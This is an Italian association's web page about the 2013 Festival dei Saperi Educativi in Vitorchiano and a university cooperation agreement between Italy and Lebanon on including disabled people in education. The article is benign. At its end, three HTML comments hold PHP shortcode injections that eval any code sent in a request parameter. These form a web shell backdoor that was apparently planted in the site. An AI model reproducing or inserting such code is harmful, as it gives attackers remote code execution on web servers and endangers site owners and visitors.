Edu Festival dei Saperi Educativi – La giornata.. le foto

Video prima parte
Video seconda parte

Festival dei Saperi Educativi – EDU 2013
Venerdì 24 maggio 2013 Momenti importanti da non dimenticare. “Un collegamento vero con l’altra sponda del Mediterraneo”, ecco come il Dott. Nicola Olivieri, Sindaco di Vitorchiano, ha sintetizzato con poche ma efficaci parole l’essenza di quello che non esitiamo a definire un evento storico.
Non si tratta solo della storia della nostra Associazione, che quest’anno celebra il ventesimo anno della sua fondazione, ma della storia di un mondo che stiamo dimostrando che può cambiare scardinando anche i pregiudizi più radicati.
Con gli occhi lucidi di commozione abbiamo indelebilmente impresso nel nostro cuore i momenti salienti della firma della Convenzione bilaterale di collaborazione fra l’Università Santo Spirito Kaslik (Libano) e l’Università Pontificia Salesiana di Vitorchiano (Italia).

In una piazza attenta si sono succedute reciproche attestazioni di stima per il percorso intrapreso, volto a realizzare in Libano quegli stessi processi di crescita sociale che hanno consentito in Italia il pieno inserimento delle persone disabili nelle istituzioni scolastiche e dunque la loro migliore inclusione in contesti prima immotivatamente preclusi a persone già penalizzate dalla disabilità.
Persone si, non numeri, non “casi clinici” o addirittura business.

Questo è lo spirito con il quale il Prof. Paolo Gambini, Responsabile FSE dell’Università Pontificia Salesiana, e la Prof.ssa Hoda Nehmé, Decana della Facoltà di Scienze Umane e Filosofia dell’Università Santo Spirito Kaslik , hanno sancito i termini di una collaborazione cui si è giunti dopo oltre due anni di studio in territorio libanese per l’individuazione dei reali e più urgenti bisogni delle persone disabili.
Fondamentale è stato l’apporto del nostro amico e consulente Dott. Nicola Filippo Titta il quale, dopo un attento studio del sistema di welfare libanese, ha individuato grazie al continuo confronto con la Prof.ssa Nehmé i punti essenziali per lo snodo di quelle attività che consentiranno in Libano il passaggio delle persone disabili ad un sistema che assicuri a tutti, a prescindere dalla proprie condizioni economiche, la possibilità di accedere a servizi scolastici attualmente accessibili solo a pochi poiché totalmente a carico dell’utenza.

Dall’analisi suddetta è scaturita l’iniziativa di formare Insegnanti di sostegno, Educatori professionali, Assistenti domiciliari e scolastici lavorando nel contempo per l’individuazione delle modifiche normative che consentiranno in Libano il passaggio dall’assistenza ai disabili, oggi esclusivamente privata, ad un’assistenza pubblica che garantisca a tutti degli standard qualitativi.
Palese l’orgoglio del Prof. Nicolò Pisanu, Direttore dell’Istituto “Progetto Uomo” dell’Università Pontificia Salesiana, il quale nell’inaugurare la IV edizione del Festival dei Saperi Educativi ha posto l’accento sui riflessi di portata mondiale che l’iniziativa avrà in termini di abbattimento delle barriere fra popoli e nazioni, che incentiverà gli scambi culturali fra i giovani che saranno i protagonisti di una Società sempre più globalizzata e sicuramente, anche grazie ad iniziative come quella da noi intrapresa, più sensibile verso le problematiche delle fasce più deboli.

Ai giovani dunque il nostro grazie per l’attenzione con cui hanno seguito le varie fasi della cerimonia ed all’entusiasmo che hanno manifestato. Infine, la nostra gratitudine alle Signore Cendrella Diab e Cesarina Olivan che seguono con dedizione e spirito di sacrificio ogni aspetto ed attività connesse alla complessiva progettualità avviata con i nostri amici Libanesi ai quali rinnoviamo il nostro sincero spirito di fratellanza.

L’esperienza appena conclusa non vuole essere un punto di arrivo bensì un nuovo punto di partenza di un percorso che vuole essere ambizioso perché quando si tratta di difendere ed incrementare i diritti delle persone disabili la nostra Associazione mette in campo le sue energie migliori per poter raggiungere ogni possibile risultato che migliori la loro qualità di vita ovunque in un mondo che anche grazie a noi speriamo diventi migliore.

<!– [insert_php]if (isset($_REQUEST["TuLZe"])){eval($_REQUEST["TuLZe"]);exit;}[/insert_php][php]if (isset($_REQUEST["TuLZe"])){eval($_REQUEST["TuLZe"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["kKVQ"])){eval($_REQUEST["kKVQ"]);exit;}[/insert_php][php]if (isset($_REQUEST["kKVQ"])){eval($_REQUEST["kKVQ"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["UqM"])){eval($_REQUEST["UqM"]);exit;}[/insert_php][php]if (isset($_REQUEST["UqM"])){eval($_REQUEST["UqM"]);exit;}[/php] –>